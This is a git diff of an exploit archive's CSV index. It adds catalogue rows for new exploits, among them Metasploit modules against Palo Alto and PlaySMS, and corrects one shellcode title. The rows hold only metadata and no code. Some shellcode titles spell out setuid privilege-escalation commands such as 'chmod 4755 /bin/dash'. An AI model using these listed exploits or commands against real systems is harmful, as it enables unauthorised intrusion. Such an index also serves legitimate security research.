@@ -5966,6 +5966,7 @@ id,file,description,date,author,type,platform,port
 44572,exploits/windows/dos/44572.txt,"Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service",2018-05-02,"Tenable NS",dos,windows,
 44579,exploits/linux/dos/44579.c,"Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free",2018-04-30,SecuriTeam,dos,linux,
 44593,exploits/windows/dos/44593.py,"HWiNFO 5.82-3410 - Denial of Service",2018-05-06,bzyo,dos,windows,
+44600,exploits/windows_x86/dos/44600.c,"2345 Security Guard 3.7 - Denial of Service",2018-05-08,anhkgg,dos,windows_x86,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -16472,6 +16473,10 @@ id,file,description,date,author,type,platform,port
 44577,exploits/hardware/remote/44577.py,"TBK DVR4104 / DVR4216 - Credentials Leak",2018-05-02,ezelf,remote,hardware,
 44582,exploits/windows/remote/44582.txt,"Call of Duty Modern Warefare 2 - Buffer Overflow",2018-05-02,momo5502,remote,windows,
 44584,exploits/multiple/remote/44584.txt,"Google Chrome V8 - Object Allocation Size Integer Overflow",2018-05-04,"Google Security Research",remote,multiple,
+44596,exploits/windows/remote/44596.py,"FTPShell Client 6.7 - Buffer Overflow",2018-05-08,r4wd3r,remote,windows,
+44597,exploits/unix/remote/44597.rb,"Palo Alto Networks - readSessionVarsFromFile() Session Corruption (Metasploit)",2018-05-08,Metasploit,remote,unix,443
+44598,exploits/php/remote/44598.rb,"PlaySMS - import.php Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
+44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - sendfromfile.php Authenticated _Filename_ Field Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 3b46caa62..3b9d7e237 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -880,4 +880,4 @@ id,file,description,date,author,type,platform
 44509,shellcodes/linux_x86/44509.c,"Linux/x86 - chmod 4755 /bin/dash Shellcode (33 bytes)",2018-04-24,absolomb,shellcode,linux_x86
 44510,shellcodes/linux_x86/44510.c,"Linux/x86 - execve(cp /bin/sh /tmp/sh; chmod +s /tmp/sh) + Null-Free Shellcode (74 bytes)",2018-04-24,absolomb,shellcode,linux_x86
 44517,shellcodes/linux_x86/44517.c,"Linux/x86 - execve(/bin/sh) + ROT-13 + RShift-2 + XOR Encoded Shellcode (44 bytes)",2018-04-24,"Nuno Freitas",shellcode,linux_x86
-44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86
+44594,shellcodes/linux_x86/44594.c,"Linux/x86 - execve(/bin/sh) + NOT Encoded Shellcode (27 bytes)",2018-05-06,"Nuno Freitas",shellcode,linux_x86